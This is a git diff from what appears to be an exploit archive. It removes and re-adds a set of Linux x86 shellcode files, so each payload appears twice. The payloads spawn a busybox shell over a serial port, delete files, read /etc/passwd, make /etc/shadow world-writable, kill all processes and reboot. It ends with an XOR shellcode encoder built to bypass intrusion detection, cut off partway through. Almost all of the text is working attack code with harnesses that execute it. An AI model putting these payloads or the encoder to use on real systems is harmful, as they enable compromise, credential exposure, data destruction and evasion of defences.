30 mov $0x3053,%ax - 50 push %eax - 68 2f 74 74 79 push $0x7974742f #port device - 68 2f 64 65 76 push $0x7665642f - 89 e3 mov %esp,%ebx - 6a 05 push $0x5 - 58 pop %eax - 89 c6 mov %eax,%esi - cd 80 int $0x80 #open - 89 c6 mov %eax,%esi - 31 c9 xor %ecx,%ecx - -dup2_loop: #set the serial port as our console - 89 f3 mov %esi,%ebx - 6a 3f push $0x3f - 58 pop %eax - cd 80 int $0x80 #dup2 - 41 inc %ecx - 80 f9 03 cmp $0x3,%cl - 75 f3 jne 80483a7 dup2_loop - 66 b8 73 68 mov $0x6873,%ax - 50 push %eax - 89 e1 mov %esp,%ecx - 52 push %edx - 51 push %ecx - 89 e1 mov %esp,%ecx - 52 push %edx - 68 79 62 6f 78 push $0x786f6279 #/bin/busybox - 68 2f 62 75 73 push $0x7375622f - 68 2f 62 69 6e push $0x6e69622f - 89 e3 mov %esp,%ebx - 6a 0b push $0xb - 58 pop %eax - cd 80 int $0x80 #execve -*/ - - - - - -int main() { -char shellcode[] = { -"\x31\xd2\x31\xc0\x6a\x02\x59\x66\xb8\x53\x30\x50\x68\x2f\x74\x74" -"\x79\x68\x2f\x64\x65\x76\x89\xe3\x6a\x05\x58\x89\xc6\xcd\x80\x89" -"\xc6\x31\xc9\x89\xf3\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf3" -"\x66\xb8\x73\x68\x50\x89\xe1\x52\x51\x89\xe1\x52\x68\x79\x62\x6f" -"\x78\x68\x2f\x62\x75\x73\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58" -"\xcd\x80"}; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - }else{ - printf("no\n"); - } - (*(void(*)()) shellcode)(); -} - +/* +General: + Serial port shell binding, busybox launching shellcode.. yey! + +Specific: + *really* wish i could tell you what i needed this for.. but meh.. + + this will bind a busybox sh shell to /dev/ttyS0, the shellcode +does not alter the baudrate settings.. 9600 is the default, but its easy enough to cycle though if were +at a different baud rate. + + +...damn how long has it been since i posted one of these? + +happy hunting + + +-phar + @ + stonedcoder +mdavis . + @ org + ioactive + . + com + +main: + 31 d2 xor %edx,%edx + 31 c0 xor %eax,%eax + 6a 02 push $0x2 #flags O_RDW + 59 pop %ecx + 66 b8 53 30 mov $0x3053,%ax + 50 push %eax + 68 2f 74 74 79 push $0x7974742f #port device + 68 2f 64 65 76 push $0x7665642f + 89 e3 mov %esp,%ebx + 6a 05 push $0x5 + 58 pop %eax + 89 c6 mov %eax,%esi + cd 80 int $0x80 #open + 89 c6 mov %eax,%esi + 31 c9 xor %ecx,%ecx + +dup2_loop: #set the serial port as our console + 89 f3 mov %esi,%ebx + 6a 3f push $0x3f + 58 pop %eax + cd 80 int $0x80 #dup2 + 41 inc %ecx + 80 f9 03 cmp $0x3,%cl + 75 f3 jne 80483a7 dup2_loop + 66 b8 73 68 mov $0x6873,%ax + 50 push %eax + 89 e1 mov %esp,%ecx + 52 push %edx + 51 push %ecx + 89 e1 mov %esp,%ecx + 52 push %edx + 68 79 62 6f 78 push $0x786f6279 #/bin/busybox + 68 2f 62 75 73 push $0x7375622f + 68 2f 62 69 6e push $0x6e69622f + 89 e3 mov %esp,%ebx + 6a 0b push $0xb + 58 pop %eax + cd 80 int $0x80 #execve +*/ + + + + + +int main() { +char shellcode[] = { +"\x31\xd2\x31\xc0\x6a\x02\x59\x66\xb8\x53\x30\x50\x68\x2f\x74\x74" +"\x79\x68\x2f\x64\x65\x76\x89\xe3\x6a\x05\x58\x89\xc6\xcd\x80\x89" +"\xc6\x31\xc9\x89\xf3\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf3" +"\x66\xb8\x73\x68\x50\x89\xe1\x52\x51\x89\xe1\x52\x68\x79\x62\x6f" +"\x78\x68\x2f\x62\x75\x73\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58" +"\xcd\x80"}; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-04-30] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13322.c b/platforms/lin_x86/shellcode/13322.c index 4b10b8a60..c00d2cfc6 100755 --- a/platforms/lin_x86/shellcode/13322.c +++ b/platforms/lin_x86/shellcode/13322.c @@ -1,30 +1,30 @@ -/* -Author : darkjoker -Site : http://darkjoker.net23.net -Shellcode : linux/x86 File unlinker 18 bytes + file path length - - .global _start -_start: - jmp one - -two: - pop %ebx - movb $0xa,%al - int $0x80 - - movb $0x1, %al - xor %ebx, %ebx - int $0x80 - -one: - call two - .string "file" -*/ - -char main [] = -"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0" -"\x01\x31\xdb\xcd\x80\xe8\xf0\xff" -"\xff\xff" -"file" //Here file path to delete - +/* +Author : darkjoker +Site : http://darkjoker.net23.net +Shellcode : linux/x86 File unlinker 18 bytes + file path length + + .global _start +_start: + jmp one + +two: + pop %ebx + movb $0xa,%al + int $0x80 + + movb $0x1, %al + xor %ebx, %ebx + int $0x80 + +one: + call two + .string "file" +*/ + +char main [] = +"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0" +"\x01\x31\xdb\xcd\x80\xe8\xf0\xff" +"\xff\xff" +"file" //Here file path to delete + // milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13323.c b/platforms/lin_x86/shellcode/13323.c index efb5b6ac5..d082ab20a 100755 --- a/platforms/lin_x86/shellcode/13323.c +++ b/platforms/lin_x86/shellcode/13323.c @@ -1,90 +1,90 @@ -/* -Author : darkjoker -Site : http://darkjoker.net23.net -Shellcode : linux/x86 Perl script execution 99 bytes + script length - - - .global _start - -_start: - xor %eax, %eax - xor %ebx, %ebx - xor %ecx, %ecx - xor %edx, %edx - xor %edi, %edi - xor %esi, %esi - push %eax - push $0x6c702e30 - push $0x30307470 - push $0x69726373 - - mov %esp, %ebx - movb $0x5, %al - movb $0x41, %cl - int $0x80 - jmp one - -two: - - mov %ebx, %esi - mov %eax, %ebx - - pop %edi - - push %edi - - // Begin http://www.int80h.org/strlen/ - xor %ecx, %ecx - xor %eax, %eax - not %ecx - repne scasb - not %ecx - dec %ecx - // End http://www.int80h.org/strlen/ - - pop %edi - mov %ecx, %eax - mov %edi, %ecx - mov %eax, %edx - - movb $0x4, %al - int $0x80 - - movb $0x6, %al - int $0x80 - - mov %esi, %ebx - movb $0xf, %al - movw $0x1fc, %cx - int $0x80 - - movb $0xb, %al - xor %ecx, %ecx - xor %edx, %edx - int $0x80 - - movb $0x1, %al - xor %ebx, %ebx - int $0x80 - -one: - call two - .string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n" -*/ -char main [] = -"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" -"\x31\xff\x31\xf6\x50\x68\x30\x2e" -"\x70\x6c\x68\x70\x74\x30\x30\x68" -"\x73\x63\x72\x69\x89\xe3\xb0\x05" -"\xb1\x41\xcd\x80\xeb\x38\x89\xde" -"\x89\xc3\x5f\x57\x31\xc9\x31\xc0" -"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f" -"\x89\xc8\x89\xf9\x89\xc2\xb0\x04" -"\xcd\x80\xb0\x06\xcd\x80\x89\xf3" -"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80" -"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" -"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3" -"\xff\xff\xff" -"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source - +/* +Author : darkjoker +Site : http://darkjoker.net23.net +Shellcode : linux/x86 Perl script execution 99 bytes + script length + + + .global _start + +_start: + xor %eax, %eax + xor %ebx, %ebx + xor %ecx, %ecx + xor %edx, %edx + xor %edi, %edi + xor %esi, %esi + push %eax + push $0x6c702e30 + push $0x30307470 + push $0x69726373 + + mov %esp, %ebx + movb $0x5, %al + movb $0x41, %cl + int $0x80 + jmp one + +two: + + mov %ebx, %esi + mov %eax, %ebx + + pop %edi + + push %edi + + // Begin http://www.int80h.org/strlen/ + xor %ecx, %ecx + xor %eax, %eax + not %ecx + repne scasb + not %ecx + dec %ecx + // End http://www.int80h.org/strlen/ + + pop %edi + mov %ecx, %eax + mov %edi, %ecx + mov %eax, %edx + + movb $0x4, %al + int $0x80 + + movb $0x6, %al + int $0x80 + + mov %esi, %ebx + movb $0xf, %al + movw $0x1fc, %cx + int $0x80 + + movb $0xb, %al + xor %ecx, %ecx + xor %edx, %edx + int $0x80 + + movb $0x1, %al + xor %ebx, %ebx + int $0x80 + +one: + call two + .string "#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n" +*/ +char main [] = +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" +"\x31\xff\x31\xf6\x50\x68\x30\x2e" +"\x70\x6c\x68\x70\x74\x30\x30\x68" +"\x73\x63\x72\x69\x89\xe3\xb0\x05" +"\xb1\x41\xcd\x80\xeb\x38\x89\xde" +"\x89\xc3\x5f\x57\x31\xc9\x31\xc0" +"\xf7\xd1\xf2\xae\xf7\xd1\x49\x5f" +"\x89\xc8\x89\xf9\x89\xc2\xb0\x04" +"\xcd\x80\xb0\x06\xcd\x80\x89\xf3" +"\xb0\x0f\x66\xb9\xfc\x01\xcd\x80" +"\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" +"\xb0\x01\x31\xdb\xcd\x80\xe8\xc3" +"\xff\xff\xff" +"#!/usr/bin/perl\nprint (\"Hello world!\\n\");\n"; // Here script source + // milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13324.c b/platforms/lin_x86/shellcode/13324.c index 34c28c35a..baf93519f 100755 --- a/platforms/lin_x86/shellcode/13324.c +++ b/platforms/lin_x86/shellcode/13324.c @@ -1,66 +1,66 @@ -/* -Linux/x86 file reader. - -65 bytes + pathname -Author: certaindeath - -Source code: -_start: - xor %eax, %eax - xor %ebx, %ebx - xor %ecx, %ecx - xor %edx, %edx - jmp two - -one: - pop %ebx - - movb $5, %al - xor %ecx, %ecx - int $0x80 - - mov %eax, %esi - jmp read - -exit: - movb $1, %al - xor %ebx, %ebx - int $0x80 - -read: - mov %esi, %ebx - movb $3, %al - sub $1, %esp - lea (%esp), %ecx - movb $1, %dl - int $0x80 - - xor %ebx, %ebx - cmp %eax, %ebx - je exit - - movb $4, %al - movb $1, %bl - movb $1, %dl - int $0x80 - - add $1, %esp - jmp read - -two: - call one - .string "file_name" -*/ -char main[]= -"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" -"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" -"\x80\x89\xc6\xeb\x06\xb0\x01\x31" -"\xdb\xcd\x80\x89\xf3\xb0\x03\x83" -"\xec\x01\x8d\x0c\x24\xb2\x01\xcd" -"\x80\x31\xdb\x39\xc3\x74\xe6\xb0" -"\x04\xb3\x01\xb2\x01\xcd\x80\x83" -"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" -"\xff" -"/etc/passwd"; //Put here the file path, default is /etc/passwd - +/* +Linux/x86 file reader. + +65 bytes + pathname +Author: certaindeath + +Source code: +_start: + xor %eax, %eax + xor %ebx, %ebx + xor %ecx, %ecx + xor %edx, %edx + jmp two + +one: + pop %ebx + + movb $5, %al + xor %ecx, %ecx + int $0x80 + + mov %eax, %esi + jmp read + +exit: + movb $1, %al + xor %ebx, %ebx + int $0x80 + +read: + mov %esi, %ebx + movb $3, %al + sub $1, %esp + lea (%esp), %ecx + movb $1, %dl + int $0x80 + + xor %ebx, %ebx + cmp %eax, %ebx + je exit + + movb $4, %al + movb $1, %bl + movb $1, %dl + int $0x80 + + add $1, %esp + jmp read + +two: + call one + .string "file_name" +*/ +char main[]= +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" +"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" +"\x80\x89\xc6\xeb\x06\xb0\x01\x31" +"\xdb\xcd\x80\x89\xf3\xb0\x03\x83" +"\xec\x01\x8d\x0c\x24\xb2\x01\xcd" +"\x80\x31\xdb\x39\xc3\x74\xe6\xb0" +"\x04\xb3\x01\xb2\x01\xcd\x80\x83" +"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" +"\xff" +"/etc/passwd"; //Put here the file path, default is /etc/passwd + // milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13325.c b/platforms/lin_x86/shellcode/13325.c index 7dbd4c942..4b7afb335 100755 --- a/platforms/lin_x86/shellcode/13325.c +++ b/platforms/lin_x86/shellcode/13325.c @@ -1,55 +1,55 @@ -/* - Linux/x86 - chmod("/etc/shadow",666) & exit(0) - - Info reg - ------------------ - %eax = 15 - %ebx = /etc/shadow - %ecx = 666 - - %eax = 1 - %ebx = 0 - - Shellcode 30 bytes - Author: Jonathan Salwan < submit [AT] shell-storm.org > - Web: http://www.shell-storm.org - - Disassembly of section .text: - - 08048054 <.text>: - 8048054: 51 push %ecx - 8048055: 66 b9 b6 01 mov $0x1b6,%cx - 8048059: 68 61 64 6f 77 push $0x776f6461 - 804805e: 68 63 2f 73 68 push $0x68732f63 - 8048063: 68 2f 2f 65 74 push $0x74652f2f - 8048068: 89 e3 mov %esp,%ebx - 804806a: 6a 0f push $0xf - 804806c: 58 pop %eax - 804806d: cd 80 int $0x80 - 804806f: 40 inc %eax - 8048070: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - - char shellcode[] = "\x51\x66\xb9\xb6" - "\x01\x68\x61\x64" - "\x6f\x77\x68\x63" // chmod("/etc/shadow",666) - "\x2f\x73\x68\x68" - "\x2f\x2f\x65\x74" - "\x89\xe3\x6a\x0f" - "\x58\xcd\x80" - - "\x40\xcd\x80"; // exit(0); - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Linux/x86 - chmod("/etc/shadow",666) & exit(0) + + Info reg + ------------------ + %eax = 15 + %ebx = /etc/shadow + %ecx = 666 + + %eax = 1 + %ebx = 0 + + Shellcode 30 bytes + Author: Jonathan Salwan < submit [AT] shell-storm.org > + Web: http://www.shell-storm.org + + Disassembly of section .text: + + 08048054 <.text>: + 8048054: 51 push %ecx + 8048055: 66 b9 b6 01 mov $0x1b6,%cx + 8048059: 68 61 64 6f 77 push $0x776f6461 + 804805e: 68 63 2f 73 68 push $0x68732f63 + 8048063: 68 2f 2f 65 74 push $0x74652f2f + 8048068: 89 e3 mov %esp,%ebx + 804806a: 6a 0f push $0xf + 804806c: 58 pop %eax + 804806d: cd 80 int $0x80 + 804806f: 40 inc %eax + 8048070: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + + char shellcode[] = "\x51\x66\xb9\xb6" + "\x01\x68\x61\x64" + "\x6f\x77\x68\x63" // chmod("/etc/shadow",666) + "\x2f\x73\x68\x68" + "\x2f\x2f\x65\x74" + "\x89\xe3\x6a\x0f" + "\x58\xcd\x80" + + "\x40\xcd\x80"; // exit(0); + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13326.c b/platforms/lin_x86/shellcode/13326.c index 06861d497..cceb8a068 100755 --- a/platforms/lin_x86/shellcode/13326.c +++ b/platforms/lin_x86/shellcode/13326.c @@ -1,50 +1,50 @@ -/* - Linux x86 | killall5 - Shellcode 34 bytes - Author: Jonathan Salwan : - 8048054: 31 c0 xor %eax,%eax - 8048056: 50 push %eax - 8048057: 66 68 6c 35 pushw $0x356c - 804805b: 68 6c 6c 61 6c push $0x6c616c6c - 8048060: 68 6e 2f 6b 69 push $0x696b2f6e - 8048065: 68 2f 73 62 69 push $0x6962732f - 804806a: 89 e3 mov %esp,%ebx - 804806c: 50 push %eax - 804806d: 89 e2 mov %esp,%edx - 804806f: 53 push %ebx - 8048070: 89 e1 mov %esp,%ecx - 8048072: b0 0b mov $0xb,%al - 8048074: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - - char shellcode[] = "\x31\xc0\x50\x66\x68\x6c" - "\x35\x68\x6c\x6c\x61\x6c" - "\x68\x6e\x2f\x6b\x69\x68" - "\x2f\x73\x62\x69\x89\xe3" - "\x50\x89\xe2\x53\x89\xe1" - "\xb0\x0b\xcd\x80"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Linux x86 | killall5 + Shellcode 34 bytes + Author: Jonathan Salwan : + 8048054: 31 c0 xor %eax,%eax + 8048056: 50 push %eax + 8048057: 66 68 6c 35 pushw $0x356c + 804805b: 68 6c 6c 61 6c push $0x6c616c6c + 8048060: 68 6e 2f 6b 69 push $0x696b2f6e + 8048065: 68 2f 73 62 69 push $0x6962732f + 804806a: 89 e3 mov %esp,%ebx + 804806c: 50 push %eax + 804806d: 89 e2 mov %esp,%edx + 804806f: 53 push %ebx + 8048070: 89 e1 mov %esp,%ecx + 8048072: b0 0b mov $0xb,%al + 8048074: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + + char shellcode[] = "\x31\xc0\x50\x66\x68\x6c" + "\x35\x68\x6c\x6c\x61\x6c" + "\x68\x6e\x2f\x6b\x69\x68" + "\x2f\x73\x62\x69\x89\xe3" + "\x50\x89\xe2\x53\x89\xe1" + "\xb0\x0b\xcd\x80"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13327.c b/platforms/lin_x86/shellcode/13327.c index e50f10eb8..25274da10 100755 --- a/platforms/lin_x86/shellcode/13327.c +++ b/platforms/lin_x86/shellcode/13327.c @@ -1,43 +1,43 @@ -/* Linux x86 PUSH reboot() - 30 bytes - * Jonathan Salwan - * Web: http://racprojet.zapto.org - * - * Disassembly of section .text: - * - * 08048054 <.text>: - * 8048054: 31 c0 xor %eax,%eax - * 8048056: 50 push %eax - * 8048057: 68 62 6f 6f 74 push $0x746f6f62 - * 804805c: 68 6e 2f 72 65 push $0x65722f6e - * 8048061: 68 2f 73 62 69 push $0x6962732f - * 8048066: 89 e3 mov %esp,%ebx - * 8048068: 50 push %eax - * 8048069: 89 e2 mov %esp,%edx - * 804806b: 53 push %ebx - * 804806c: 89 e1 mov %esp,%ecx - * 804806e: b0 0b mov $0xb,%al - * 8048070: cd 80 int $0x80 - * - */ - -main() -{ -char shellcode[] = - "\x31\xc0" - "\x50" - "\x68\x62\x6f\x6f\x74" - "\x68\x6e\x2f\x72\x65" - "\x68\x2f\x73\x62\x69" - "\x89\xe3" - "\x50" - "\x89\xe2" - "\x53" - "\x89\xe1" - "\xb0\x0b" - "\xcd\x80"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); -} - +/* Linux x86 PUSH reboot() - 30 bytes + * Jonathan Salwan + * Web: http://racprojet.zapto.org + * + * Disassembly of section .text: + * + * 08048054 <.text>: + * 8048054: 31 c0 xor %eax,%eax + * 8048056: 50 push %eax + * 8048057: 68 62 6f 6f 74 push $0x746f6f62 + * 804805c: 68 6e 2f 72 65 push $0x65722f6e + * 8048061: 68 2f 73 62 69 push $0x6962732f + * 8048066: 89 e3 mov %esp,%ebx + * 8048068: 50 push %eax + * 8048069: 89 e2 mov %esp,%edx + * 804806b: 53 push %ebx + * 804806c: 89 e1 mov %esp,%ecx + * 804806e: b0 0b mov $0xb,%al + * 8048070: cd 80 int $0x80 + * + */ + +main() +{ +char shellcode[] = + "\x31\xc0" + "\x50" + "\x68\x62\x6f\x6f\x74" + "\x68\x6e\x2f\x72\x65" + "\x68\x2f\x73\x62\x69" + "\x89\xe3" + "\x50" + "\x89\xe2" + "\x53" + "\x89\xe1" + "\xb0\x0b" + "\xcd\x80"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13328.c b/platforms/lin_x86/shellcode/13328.c index adb62e528..80073da2a 100755 --- a/platforms/lin_x86/shellcode/13328.c +++ b/platforms/lin_x86/shellcode/13328.c @@ -1,223 +1,223 @@ -/* -* sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com -* - sh3llc0der.c v0.1 (beta) -* - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing -* - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed) -* - if you find bugs i dont wanna know -> fix them and its urs -* - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls -* -* nb: nasm ur files with -felf, then ld -o them (u know) -* usage: ./sh3llc0der [options] binaryfile -* - output is a encoded byte array (or raw binary if -o is specified) -* - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!) -* -*/ - -#include -#include -#include -#include -#include -#include - -char decoder[] = "\xeb\x10\x5e\x31\xc9" - "\xb1\x00\x80\x74\x0e" // \x00 location of payload size - "\xff\x00\xfe\xc9\x75" // \x00 location of xor key - "\xf7\xeb\x05\xe8\xeb" - "\xff\xff\xff"; - -int getkey(int i) { - int seed; - struct timeval tm; - gettimeofday(&tm, NULL); - seed = tm.tv_sec + tm.tv_usec; srandom(seed); - return (random() % i) +1; -} - -void usage() { - printf("Usage: sh3llc0der [options] shellcode\n"); - printf("\tv - verbose\n"); - printf("\to [outfile] - out file (stdout is default)\n"); - printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n"); - printf("\tr - randomize NOP sled with other operations\n"); - printf("\t? - this crud\n"); -} - -int main(int argc, char **argv) { - Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg; - - int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0; - int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0; - int write_file = 0; int is_verbose = 0; - unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL; - char *upayload = NULL; char *outfile = NULL; - unsigned int payload_offset = 0; unsigned int payload_size = 0; - int (*func)(); - - opterr = 0; int option = 1; - while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) { - switch(option) { - case 'v': - is_verbose = 1; - break; - case 'o': - write_file = 1; - outfile = optarg; - if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); } - break; - case 'n': - if(optarg != NULL) noop_length = atoi(optarg); else break; - include_noop_instructions = 1; - break; - case 'r': - use_nop_randomization = 1; - break; - case '?': - usage(); exit(0); - break; - default: - // nothing - break; - }; - } - - if(argc < 2) { usage(); exit(0); } - printf("[+] sh3llc0der - sm4x 2008\n"); - - upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); } - - if(is_verbose) { printf("[?] opening %s\n", upayload); } - FILE *p = fopen(upayload, "rb"); - if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); } - - fseek(p, 0, SEEK_END); - len = ftell(p); rewind(p); - if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); } - - /* adjust our noop length for the decoder size */ - - if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); } - printf("[+] shellcode length: %d Bytes\n", len); - - b = (char *) malloc(sizeof(char)*len); - if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); } - - if(is_verbose) { printf("[?] reading %s....\n", upayload); } - r = fread(b, 1, len, p); - if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); } - fclose(p); p = NULL; - if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); } - - /* get our ELF header out of the binary */ - memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr)); - - printf("[+] Starting address: 0x%x\n", elfhdr.e_entry); - /* seek to our offset */ - printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff); - - /* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */ - for(i = 0;i < elfhdr.e_phnum; i++) { - /* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */ - memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr)); - if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) { - printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n", - txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset); - found_txt_seg = 1; break; - } else { - found_txt_seg = 0; - } - } if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); } - - /* calculations for start of .text with offset (usually 0) */ - payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry; - payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size; - - printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size); - - int new_payload_size = noop_length+payload_size+sizeof(decoder)-1; - - nb = (char *) malloc(sizeof(char) * new_payload_size); - if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); } - memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out - - // ensure we have a NULL free xor'd shellcode -> keep trying until we do - int is_null = 0; int warn = 0; int attempts = 0; - while(1) { - if(attempts > 20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); } - key = getkey(255); - for(i = 0; i < payload_size; i++) { - c = b[payload_offset+i]; c ^= key; - if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; } - if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; } - } attempts++; - if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; } - - if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); } - if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); } - - /* fill our new buffer -nb*/ - for(i = 0; i < payload_size; i++) { - nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i]; - if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); } - nb[noop_length+sizeof(decoder)-1+i] ^= key; - } break; - } if(is_verbose) { printf("\n"); } - if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) some problems with xor-enc (NULL FREE)...\n"); } - - for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]); - - /* we need to set our primary instructions to decode with xor */ - decoder[6] = payload_size; decoder[11] = key; - - printf("\n"); - if(include_noop_instructions) { - printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length); - // minus the decoder size - if(use_nop_randomization) { - for(i = 0; i < noop_length; i++) { - int p = getkey(5); - // hardly random - but change to modify the primary sled sig - switch((int)p) { - case 1: nb[i] = 0x90; break; - case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break; - case 3: nb[i] = 0x50; break; - case 4: nb[i] = 0x58; break; - case 5: nb[i] = 0x99; break; - default: nb[i] = 0x90; break; - }; - } - } else { - for(i = 0; i < noop_length; i++) nb[i] = 0x90; - } - } - - printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size); - memcpy(nb+noop_length, decoder, sizeof(decoder)-1); - for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]); - printf("\n"); - - if(write_file) { - printf("[+] writing payload to: %s\n", outfile); - FILE *w = fopen(outfile, "wb"); - if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; } - int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0); - fclose(w); - printf("[+] done %d written.\n", bytes); - } - - continue_test: - printf("[+] testing payload now ...\n"); - printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n"); - - /* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */ - func = (int (*)()) nb; - (int)(*func)(); - - // should never get here really - - cleanup: - if(p != NULL) fclose(p); - return 0; -} - +/* +* sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com +* - sh3llc0der.c v0.1 (beta) +* - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing +* - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed) +* - if you find bugs i dont wanna know -> fix them and its urs +* - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls +* +* nb: nasm ur files with -felf, then ld -o them (u know) +* usage: ./sh3llc0der [options] binaryfile +* - output is a encoded byte array (or raw binary if -o is specified) +* - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!) +* +*/ + +#include +#include +#include +#include +#include +#include + +char decoder[] = "\xeb\x10\x5e\x31\xc9" + "\xb1\x00\x80\x74\x0e" // \x00 location of payload size + "\xff\x00\xfe\xc9\x75" // \x00 location of xor key + "\xf7\xeb\x05\xe8\xeb" + "\xff\xff\xff"; + +int getkey(int i) { + int seed; + struct timeval tm; + gettimeofday(&tm, 